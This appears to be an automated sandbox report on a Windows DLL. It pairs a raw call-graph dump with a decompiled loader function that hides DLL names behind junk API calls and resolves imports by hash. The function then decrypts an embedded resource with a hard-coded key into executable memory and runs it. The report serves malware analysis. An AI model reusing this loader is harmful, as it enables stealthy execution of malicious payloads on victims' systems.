__decode_pointer 5 API calls 26932->26933 26934 1002616a 26933->26934 26934->26927 26935 10026171 26934->26935 27037 10025d39 69 API calls 3 library calls 26935->27037 26937 10026179 GetCurrentThreadId 26937->26912 26939 10027c0c 26938->26939 26940 10027bed GetEnvironmentStringsW 26938->26940 26942 10027bf5 26939->26942 26943 10027ca7 26939->26943 26941 10027c01 GetLastError 26940->26941 26940->26942 26941->26939 26944 10027c36 WideCharToMultiByte 26942->26944 26945 10027c27 GetEnvironmentStringsW 26942->26945 26946 10027caf GetEnvironmentStrings 26943->26946 26947 100207dd 26943->26947 26951 10027c6a 26944->26951 26952 10027c9c FreeEnvironmentStringsW 26944->26952 26945->26944 26945->26947 26946->26947 26948 10027cbf 26946->26948 26964 10027619 26947->26964 27040 1002691e 69 API calls _malloc 26948->27040 27039 1002691e 69 API calls _malloc 26951->27039 26952->26947 26955 10027cd8 26957 10027ceb _memcpy_s 26955->26957 26958 10027cdf FreeEnvironmentStringsA 26955->26958 26956 10027c70 26956->26952 26959 10027c79 WideCharToMultiByte 26956->26959 26962 10027cf3 FreeEnvironmentStringsA 26957->26962 26958->26947 26960 10027c8a 26959->26960 26961 10027c93 26959->26961 26963 1001f6f4 _realloc 69 API calls 26960->26963 26961->26952 26962->26947 26963->26961 27041 10022714 26964->27041 26966 10027625 GetStartupInfoA 26967 1002695e __calloc_crt 69 API calls 26966->26967 26975 10027646 26967->26975 26968 10027850 __initptd 26968->26812 26969 100277cd GetStdHandle 26974 10027797 26969->26974 26970 10027832 SetHandleCount 26970->26968 26971 1002695e __calloc_crt 69 API calls 26971->26975 26972 100277df GetFileType 26972->26974 26973 1002771a 26973->26974 26976 10027743 GetFileType 26973->26976 26977 1002774e 26973->26977 26974->26969 26974->26970 26974->26972 26980 100277f6 26974->26980 26975->26968 26975->26971 26975->26973 26975->26974 26976->26973 26976->26977 26977->26968 26977->26973 27042 1002894c 69 API calls 5 library calls 26977->27042 26980->26968 26980->26974 27043 1002894c 69 API calls 5 library calls 26980->27043 27044 10020d63 26981->27044 26983 10020e4d 26983->26783 26984->26801 26986->26817 26987->26821 26988->26818 26989->26822 26990->26791 26992->26784 26996 10026962 26993->26996 26995 10020873 26995->26801 26999 10025c66 TlsGetValue 26995->26999 26996->26995 26997 10026982 Sleep 26996->26997 27064 1001fcce 26996->27064 26998 10026997 26997->26998 26998->26995 26998->26996 27000 10025c9a GetModuleHandleA 26999->27000 27001 10025c79 26999->27001 27002 10020891 27000->27002 27003 10025ca9 GetProcAddress 27000->27003 27001->27000 27004 10025c83 TlsGetValue 27001->27004 27002->26804 27002->26805 27005 10025c92 27003->27005 27006 10025c8e 27004->27006 27005->27002 27007 10025cb9 RtlDecodePointer 27005->27007 27006->27000 27006->27005 27007->27002 27008->26810 27011 1001f700 __initptd 27009->27011 27010 1001f779 _realloc __initptd 27010->26801 27011->27010 27012 1001f73f 27011->27012 27083 10023fe8 69 API calls 2 library calls 27011->27083 27012->27010 27013 1001f754 RtlFreeHeap 27012->27013 27013->27010 27015 1001f766 27013->27015 27086 10020b71 69 API calls __getptd_noexit 27015->27086 27017 1001f76b GetLastError 27017->27010 27018 1001f731 27085 1001f74a LeaveCriticalSection _doexit 27018->27085 27019 1001f717 ___sbh_find_block 27019->27018 27084 1002408c VirtualFree VirtualFree HeapFree __VEC_memcpy __shift 27019->27084 27022->26801 27023->26899 27024->26903 27026->26916 27028 10025c2e GetModuleHandleA 27027->27028 27029 10025c0d 27027->27029 27031 10025c57 27028->27031 27032 10025c3d GetProcAddress 27028->27032 27029->27028 27030 10025c17 TlsGetValue 27029->27030 27034 10025c22 27030->27034 27031->26919 27033 10025c26 27032->27033 27033->27031 27035 10025c4d RtlEncodePointer 27033->27035 27034->27028 27034->27033 27035->27031 27036->26926 27037->26937 27039->26956 27040->26955 27041->26966 27042->26977 27043->26980 27045 10020d6f __initptd 27044->27045 27060 10023fe8 69 API calls 2 library calls 27045->27060 27047 10020d76 27049 10025c66 __decode_pointer 5 API calls 27047->27049 27059 10020db2 _doexit 27047->27059 27051 10020da5 27049->27051 27050 10020dfd 27052 10020e03 27050->27052 27053 10020e2b __initptd 27050->27053 27054 10025c66 __decode_pointer 5 API calls 27051->27054 27062 10023f10 LeaveCriticalSection 27052->27062 27053->26983 27054->27059 27056 10020e10 27063 10020bff GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 27056->27063 27061 10020e1c LeaveCriticalSection _doexit 27059->27061 27060->27047 27061->27050 27062->27056 27065 1001fcda __initptd 27064->27065 27066 1001fcf2 27065->27066 27076 1001fd11 _memset 27065->27076 27077 10020b71 69 API calls __getptd_noexit 27066->27077 27068 1001fcf7 27078 10024f4c 5 API calls 2 library calls 27068->27078 27070 1001fd83 RtlAllocateHeap 27070->27076 27071 1001fd07 __initptd 27071->26996 27076->27070 27076->27071 27079 10023fe8 69 API calls 2 library calls 27076->27079 27080 10024835 5 API calls 2 library calls 27076->27080 27081 1001fdca LeaveCriticalSection _doexit 27076->27081 27082 10024e24 5 API calls __decode_pointer 27076->27082 27077->27068 27079->27076 27080->27076 27081->27076 27082->27076 27083->27019 27084->27018 27085->27012 27086->27017 27125 1001f631 27087->27125 27089 10003705 27090 1000370a 27089->27090 27091 1001f6f4 _realloc 69 API calls 27089->27091 27090->26829 27092 1000372d 27091->27092 27092->26829 27153 100014f4 GetCurrencyFormatW 27093->27153 27095 10001585 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27096 1000161c GetCurrencyFormatW 27095->27096 27154 10001395 27096->27154 27099 1000167c 27099->26836 27100 10001654 GetCurrencyFormatW 27100->27096 27100->27099 27102 10001838 GetCurrencyFormatW 27101->27102 27103 1000188f 27101->27103 27104 10001862 ___DllMainCRTStartup 27102->27104 27103->26842 27105 10001875 GetCurrencyFormatW 27104->27105 27106 10001899 GetCurrencyFormatW GetCurrencyFormatW 27104->27106 27105->27102 27105->27103 27106->27103 27108 10001960 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27107->27108 27109 10001a05 27107->27109 27108->27108 27108->27109 27110 10001a0a 6 API calls 27109->27110 27110->27110 27111 10001b23 ??3@YAXPAX 27110->27111 27111->26890 27112->26892 27161 100039a9 GetCurrencyFormatW GetCurrencyFormatW 27113->27161 27117 1001fbbd 27116->27117 27118 1001fbbf IsDebuggerPresent 27116->27118 27117->26830 27266 1002caf6 27118->27266 27121 10026347 SetUnhandledExceptionFilter UnhandledExceptionFilter 27122 1002636c GetCurrentProcess TerminateProcess 27121->27122 27123 10026364 __invoke_watson 27121->27123 27122->26830 27123->27122 27124->26894 27126 1001f6de 27125->27126 27137 1001f63f 27125->27137 27151 10024e24 5 API calls __decode_pointer 27126->27151 27128 1001f6e4 27152 10020b71 69 API calls __getptd_noexit 27128->27152 27131 1001f6ea 27131->27089 27134 1001f6a2 RtlAllocateHeap 27134->27137 27135 1001f654 27135->27137 27144 10024de1 69 API calls __NMSG_WRITE 27135->27144 27145 10024c41 69 API calls 6 library calls 27135->27145 27146 10020bff GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 27135->27146 27137->27134 27137->27135 27138 1001f6d5 27137->27138 27139 1001f6c9 27137->27139 27142 1001f6c7 27137->27142 27147 1001f5e2 69 API calls 4 library calls 27137->27147 27148 10024e24 5 API calls __decode_pointer 27137->27148 27138->27089 27149 10020b71 69 API calls __getptd_noexit 27139->27149 27150 10020b71 69 API calls __getptd_noexit 27142->27150 27144->27135 27145->27135 27147->27137 27148->27137 27149->27142 27150->27138 27151->27128 27152->27131 27153->27095 27156 100013a1 ___DllMainCRTStartup 27154->27156 27155 100013b2 27155->27099 27155->27100 27156->27155 27157 10001406 GetCurrencyFormatW 27156->27157 27158 10001450 GetCurrencyFormatW 27156->27158 27157->27156 27159 10001427 GetCurrencyFormatW 27157->27159 27158->27156 27160 10001471 GetCurrencyFormatW 27158->27160 27159->27156 27160->27156 27216 10001e20 GetCurrencyFormatW 27161->27216 27163 10003a01 27164 10003a0e GetCurrencyFormatW 27163->27164 27165 10003a07 27163->27165 27164->27165 27166 10003a33 GetCurrencyFormatW GetCurrencyFormatW 27164->27166 27165->26894 27217 10001e20 GetCurrencyFormatW 27166->27217 27168 10003a76 27168->27165 27169 10003a7c GetCurrencyFormatW GetCurrencyFormatW 27168->27169 27169->27165 27170 10003ac4 GetCurrencyFormatW 27169->27170 27170->27165 27171 10003aee GetCurrencyFormatW 27170->27171 27171->27165 27172 10003b11 GetCurrencyFormatW GetCurrencyFormatW 27171->27172 27173 10003c26 GetCurrencyFormatW GetNativeSystemInfo GetCurrencyFormatW GetCurrencyFormatW 27172->27173 27174 10003b6d 27172->27174 27218 10001de9 GetCurrencyFormatW 27173->27218 27177 10003ba2 GetCurrencyFormatW 27174->27177 27178 10003b8d GetCurrencyFormatW 27174->27178 27176 10003c8a GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27219 10001de9 GetCurrencyFormatW 27176->27219 27180 10003bb4 GetCurrencyFormatW 27177->27180 27178->27180 27182 10003bf4 GetCurrencyFormatW 27180->27182 27183 10003bd7 GetCurrencyFormatW 27180->27183 27181 10003cef 27181->27165 27184 10003cfa GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27181->27184 27182->27173 27182->27174 27183->27182 27185 10003d7e 27184->27185 27186 10003e14 GetCurrencyFormatW GetCurrencyFormatW GetProcessHeap HeapAlloc GetCurrencyFormatW 27185->27186 27187 10003d8d GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27185->27187 27188 10003ead GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27186->27188 27189 10003e7d GetCurrencyFormatW 27186->27189 27190 10003e05 27187->27190 27220 10001e20 GetCurrencyFormatW 27188->27220 27189->27165 27190->27165 27190->27186 27192 10003f6e 27193 100041d1 27192->27193 27194 10003f78 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27192->27194 27251 10003567 12 API calls 27193->27251 27196 10003fd5 7 API calls 27194->27196 27221 10001e51 24 API calls ___DllMainCRTStartup 27196->27221 27198 100040b9 27198->27193 27199 100040c4 GetCurrencyFormatW 27198->27199 27200 10004155 27199->27200 27201 100040ef GetCurrencyFormatW GetCurrencyFormatW 27199->27201 27203 1000415c GetCurrencyFormatW 27200->27203 27249 1000290c 19 API calls 27201->27249 27222 10002bde 28 API calls 27203->27222 27204 1000412b GetCurrencyFormatW 27204->27203 27206 1000417e 27206->27193 27207 10004183 GetCurrencyFormatW 27206->27207 27223 10002482 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27207->27223 27210 100041aa GetCurrencyFormatW 27250 10002863 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27210->27250 27212 100041cc 27212->27193 27213 100041e0 27212->27213 27213->27165 27214 10004223 GetCurrencyFormatW 27213->27214 27215 100041fc GetCurrencyFormatW 27213->27215 27214->27165 27215->27165 27216->27163 27217->27168 27218->27176 27219->27181 27220->27192 27221->27198 27222->27206 27224 10002518 GetCurrencyFormatW 27223->27224 27225 10002539 GetCurrencyFormatW GetCurrencyFormatW 27223->27225 27224->27225 27252 10001db6 GetCurrencyFormatW 27225->27252 27227 10002585 GetCurrencyFormatW 27253 100021ce GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27227->27253 27229 100025b1 GetCurrencyFormatW GetCurrencyFormatW 27230 1000283b 27229->27230 27231 1000261c GetCurrencyFormatW GetCurrencyFormatW 27229->27231 27232 1000227a ___DllMainCRTStartup 11 API calls 27230->27232 27254 10001db6 GetCurrencyFormatW 27231->27254 27235 10002850 27232->27235 27234 1000266c GetCurrencyFormatW 27255 100021ce GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27234->27255 27235->27193 27235->27210 27237 10002698 GetCurrencyFormatW 27238 10002766 GetCurrencyFormatW 27237->27238 27239 100026cb GetCurrencyFormatW 27237->27239 27240 100027b7 GetCurrencyFormatW 27238->27240 27241 10002789 GetCurrencyFormatW 27238->27241 27239->27238 27242 100026f2 GetCurrencyFormatW 27239->27242 27244 100027de GetCurrencyFormatW 27240->27244 27241->27240 27243 100027ae 27241->27243 27256 1000227a 27242->27256 27243->27244 27246 10002807 GetCurrencyFormatW 27244->27246 27246->27230 27246->27231 27248 10002720 GetCurrencyFormatW 27248->27246 27249->27204 27250->27212 27251->27165 27252->27227 27253->27229 27254->27234 27255->27237 27257 10002289 GetCurrencyFormatW 27256->27257 27261 10002283 27256->27261 27258 10002348 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27257->27258 27263 100022c1 27257->27263 27259 1000240d GetCurrencyFormatW 27258->27259 27260 1000242f GetCurrencyFormatW GetCurrencyFormatW VirtualProtect 27258->27260 27259->27260 27260->27261 27261->27235 27261->27248 27262 1000230d GetCurrencyFormatW 27262->27261 27263->27261 27263->27262 27264 100022dd GetCurrencyFormatW 27263->27264 27264->27261 27265 10002306 27264->27265 27265->27262 27266->27121 27267 10034c48 GetCurrencyFormatW GetCurrencyFormatW 27268 10010a4a 27271 10010a56 __EH_prolog3 27268->27271 27270 10010aa4 27295 100105f0 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 27270->27295 27271->27270 27279 10010763 EnterCriticalSection 27271->27279 27293 10004e6e 2 API calls 4 library calls 27271->27293 27294 10010873 TlsAlloc InitializeCriticalSection 27271->27294 27273 10010ab1 27276 10010ab7 27273->27276 27277 10010aca ~_Task_impl 27273->27277 27296 10010915 90 API calls 4 library calls 27276->27296 27280 10010782 27279->27280 27282 100107d0 GlobalHandle GlobalUnlock 27280->27282 27283 100107bb 27280->27283 27292 1001083e _memset 27280->27292 27281 10010852 LeaveCriticalSection 27281->27271 27285 100010c9 ctype 83 API calls 27282->27285 27297 100010c9 27283->27297 27287 100107ed GlobalReAlloc 27285->27287 27288 100107f7 27287->27288 27289 1001081f GlobalLock 27288->27289 27290 10010810 LeaveCriticalSection 27288->27290 27291 10010802 GlobalHandle GlobalLock 27288->27291 27289->27292 27290->27289 27291->27290 27292->27281 27293->27271 27294->27271 27295->27273 27296->27277 27298 100010dc ctype 27297->27298 27299 100010e9 GlobalAlloc 27298->27299 27301 10001027 83 API calls ctype 27298->27301 27299->27288 27301->27299 27302 1000373c 27303 10003745 ExitProcess 27302->27303 27304 1000374c 27302->27304 27307 10003122 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27304->27307 27308 100031b1 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27307->27308 27309 1000355d 27307->27309 27308->27309 27310 1000320d GetCurrencyFormatW 27308->27310 27310->27309 27311 10003231 27310->27311 27312 10003249 GetCurrencyFormatW 27311->27312 27313 1000327d GetCurrencyFormatW 27311->27313 27312->27309 27314 10003274 GetCurrencyFormatW 27312->27314 27313->27309 27315 1000329a 27313->27315 27314->27309 27319 10003530 GetCurrencyFormatW 27314->27319 27317 100032a9 7 API calls 27315->27317 27318 1000349f GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW bsearch 27315->27318 27317->27309 27320 10003388 GetCurrencyFormatW 27317->27320 27318->27309 27318->27314 27319->27309 27321 10003452 GetCurrencyFormatW GetCurrencyFormatW qsort 27320->27321 27322 100033af 6 API calls 27320->27322 27321->27318 27322->27321 27322->27322 27323 1000302d VirtualAlloc

                                                                                                            Executed Functions

                                                                                                            Function 100042F6 Relevance: 133.6, APIs: 46, Strings: 30, Instructions: 598memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E100042F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v4;
				int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				int _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				int _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				struct HINSTANCE__* _v80;
				signed int _v84;
				int _v88;
				void* _v92;
				signed int _t177;
				int _t183;
				int _t185;
				intOrPtr _t277;
				struct HRSRC__* _t278;
				long _t280;
				signed int _t285;
				long _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t298;
				short* _t312;
				void* _t314;
				void* _t321;
				short* _t326;
				signed int _t330;
				void* _t334;
				intOrPtr _t338;

				_t322 = __esi;
				_t319 = __edi;
				_t318 = __edx;
				_t314 = __ecx;
				_t311 = __ebx;
				_t330 =  &_v92;
				_t177 =  *0x10045580; // 0x6a53a566
				_v4 = _t177 ^ _t330;
				_v80 = _a4;
				_t336 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t183 = 1;
				} else {
					_t185 = E100036FA(__ebx, __esi, _t336);
					_t337 = _t185;
					if(_t185 != 0) {
						_push(0x10036c38);
						E10020633(__ebx, __edx, __edi, __esi, __eflags);
						_t183 = 0;
						__eflags = 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_t326 = L"xadqsavcbdfewescGADW";
						_t312 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						 *0x100440cc = _t185;
						 *0x100440d0 = _t185;
						 *0x100440d4 = _t185;
						 *0x100440dc = _t185;
						 *0x100440d8 = _t185;
						 *0x100440e0 = _t185;
						 *0x100440e4 = _t185;
						_v32 = 0x417;
						_v30 = 0x44e;
						_v28 = 0x451;
						_v26 = 0x43a;
						_v24 = 0x416;
						_v22 = 0x401;
						_v20 = 0x448;
						_v18 = 0x428;
						_v16 = 0x44e;
						_v14 = 0x41a;
						_v12 = 0x41f;
						_v10 = 0x441;
						_v8 = _t185;
						_v76 = 0x42a;
						_v74 = 0x442;
						_v72 = 0x423;
						_v70 = 0x44e;
						_v68 = 0x448;
						_v66 = 0x44f;
						_v64 = 0x42c;
						_v62 = 0x43b;
						_v60 = 0x442;
						_v58 = _t185;
						_v56 = 0x442;
						_v54 = 0x44a;
						_v52 = 0x43f;
						_v50 = 0x448;
						_v48 = 0x423;
						_v46 = 0x437;
						_v44 = 0x43d;
						_v42 = 0x43a;
						_v40 = 0x451;
						_v38 = 0x442;
						_v36 = _t185;
						 *((short*)(_t330 + 0x64 + GetCurrencyFormatW(_t185, 0x11d4, _t312, _t185, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6b;
						 *((short*)(_t330 + 0x66 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x60 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x72;
						 *((short*)(_t330 + 0x6a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6e;
						 *((short*)(_t330 + 0x6c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x6e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x70 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x33;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x32;
						 *((short*)(_t330 + 0x74 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x2e;
						 *((short*)(_t330 + 0x76 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x64;
						 *((short*)(_t330 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x38 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6e;
						 *((short*)(_t330 + 0x3a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x74;
						 *((short*)(_t330 + 0x3c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x3e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x42 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x44 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x4c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6d;
						 *((short*)(_t330 + 0x4e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x73;
						 *((short*)(_t330 + 0x50 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x76;
						 *((short*)(_t330 + 0x52 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x63;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x72;
						 *((short*)(_t330 + 0x56 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x74;
						 *((short*)(_t330 + 0x58 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x5a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x64;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6c;
						_v92 = E10001534(_t314, _t337, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2,  &_v32);
						_v84 = E10001534(_t314, _t337, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39,  &_v76);
						_v88 = E10001534(_t314, _t337, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82,  &_v56);
						 *0x10046a74 = E10001688(_t254, 0x4cba7001);
						 *0x10046a70 = E10001688(_v88, 0x4e026ffd);
						 *0x10046a64 = E10001688(_v88, 0xc066615c);
						 *0x10046a54 = E10001688(_v88, 0xdad370ab);
						 *0x10046a68 = E10001688(_v88, 0x3762b189);
						 *0x10046a80 = E10001688(_v88, 0x4ec2add7);
						 *0x10046a2c = E10001688(_v88, 0x4e6ab1d2);
						 *0x10046a30 = E10001688(_v92, 0x626d0ab3);
						 *0x10046a3c = E10001688(_v92, 0x491ca2f6);
						 *0x10046a58 = E10001688(_v92, 0x74860909);
						 *0x10046a50 = E10001688(_v92, 0x13c17412);
						 *0x10046a4c = E10001688(_v92, 0x4a42047a);
						 *0x10046a5c = E10001688(_v92, 0x4d093b11);
						 *0x10046a84 = E10001688(_v92, 0x1f051606);
						 *0x10046a40 = E10001688(_v92, 0xdd86ddbc);
						 *0x10046a38 = E10001688(_v84, 0x3ed46385);
						 *0x10046a7c = E10001688(_v92, 0x417f6a7d);
						 *0x10046a78 = E10001688(_v92, 0xb88a2b15);
						 *0x10046a60 = E10001688(_v92, 0x3fbe89a1);
						 *0x10046a34 = E10001688(_v92, 0xbcc9930d);
						 *0x10046a6c = E10001688(_v92, 0x2c4bdae9);
						 *0x10046a48 = E10001688(_v92, 0x640963da);
						_t277 = E10001688(_v92, 0xfa5d867);
						_t334 = _t330 + 0x100;
						 *0x10046a44 = _t277; // executed
						_t278 = FindResourceW(_v80, 0x3275, 0x10036c5c); // executed
						_v84 = _t278;
						_v92 = LoadResource(_v80, _t278);
						_t280 = SizeofResource(_v80, _v84);
						_push(0x22b9);
						_push(_t326);
						_v88 = _t280;
						_t338 =  *0x10046a3c; // 0x76d866e0
						_push(0);
						_push(_t312);
						_push(0x11d4);
						_push(0);
						if(_t338 == 0) {
							_v84 = GetCurrencyFormatW() *  *0x100440d0 + 0x2000;
							_t285 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9);
							_t291 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84;
							__eflags = _t291;
							_t292 = VirtualAlloc(0, _v88, _t291, _t285 *  *0x100440cc + 0x40);
						} else {
							_v84 = GetCurrencyFormatW() *  *0x100440e0 + 0x2000;
							_t292 =  *0x10046a3c(0xffffffff, 0, _v88, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 + 0x40, 0); // executed
						}
						_t313 = _v88;
						_t324 = _t292;
						memcpy(_t292, _v92, _v88);
						_t294 = malloc(0x4708); // executed
						_t321 = _t294;
						E100018D8(0xed9e0cf, 0x96c3a441, 0x245e78a3, _t321, "u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(", 0x3f);
						E10001B36(0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t321, _t292, _v88);
						 *0x10046a64(_t321);
						_t298 = E100042CA(_t324, _t313);
						_t330 = _t334 + 0x4c;
						 *0x10046a8c = _t298;
						 *0x10046a88(_v80);
						_pop(_t319);
						_t322 = 1;
						_t311 = 0;
						goto L6;
					}
				}
				return E1001FBB5(_t183, _t311, _v4 ^ _t330, _t318, _t319, _t322);
			}




























































                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f6
                                                                                                            0x100042f9
                                                                                                            0x10004300
                                                                                                            0x10004308
                                                                                                            0x10004310
                                                                                                            0x10004311
                                                                                                            0x10004b56
                                                                                                            0x10004b58
                                                                                                            0x10004317
                                                                                                            0x10004317
                                                                                                            0x1000431c
                                                                                                            0x1000431e
                                                                                                            0x10004b5b
                                                                                                            0x10004b60
                                                                                                            0x10004b66
                                                                                                            0x10004b66
                                                                                                            0x10004324
                                                                                                            0x10004324
                                                                                                            0x10004325
                                                                                                            0x10004326
                                                                                                            0x1000432d
                                                                                                            0x10004333
                                                                                                            0x1000433a
                                                                                                            0x10004347
                                                                                                            0x1000434c
                                                                                                            0x10004351
                                                                                                            0x10004356
                                                                                                            0x1000435b
                                                                                                            0x10004360
                                                                                                            0x10004365
                                                                                                            0x1000436a
                                                                                                            0x10004371
                                                                                                            0x10004378
                                                                                                            0x1000437f
                                                                                                            0x10004386
                                                                                                            0x1000438d
                                                                                                            0x10004394
                                                                                                            0x1000439b
                                                                                                            0x100043a2
                                                                                                            0x100043a9
                                                                                                            0x100043b0
                                                                                                            0x100043b7
                                                                                                            0x100043be
                                                                                                            0x100043c3
                                                                                                            0x100043ca
                                                                                                            0x100043d1
                                                                                                            0x100043d8
                                                                                                            0x100043df
                                                                                                            0x100043e6
                                                                                                            0x100043ed
                                                                                                            0x100043f4
                                                                                                            0x100043fb
                                                                                                            0x10004402
                                                                                                            0x10004407
                                                                                                            0x1000440e
                                                                                                            0x10004415
                                                                                                            0x1000441c
                                                                                                            0x10004423
                                                                                                            0x1000442a
                                                                                                            0x10004431
                                                                                                            0x10004438
                                                                                                            0x1000443f
                                                                                                            0x10004446
                                                                                                            0x1000444d
                                                                                                            0x10004467
                                                                                                            0x10004483
                                                                                                            0x1000449c
                                                                                                            0x100044bb
                                                                                                            0x100044d7
                                                                                                            0x100044f3
                                                                                                            0x1000450f
                                                                                                            0x1000452b
                                                                                                            0x10004547
                                                                                                            0x10004563
                                                                                                            0x1000457f
                                                                                                            0x10004598
                                                                                                            0x100045b7
                                                                                                            0x100045d3
                                                                                                            0x100045ef
                                                                                                            0x1000460b
                                                                                                            0x10004627
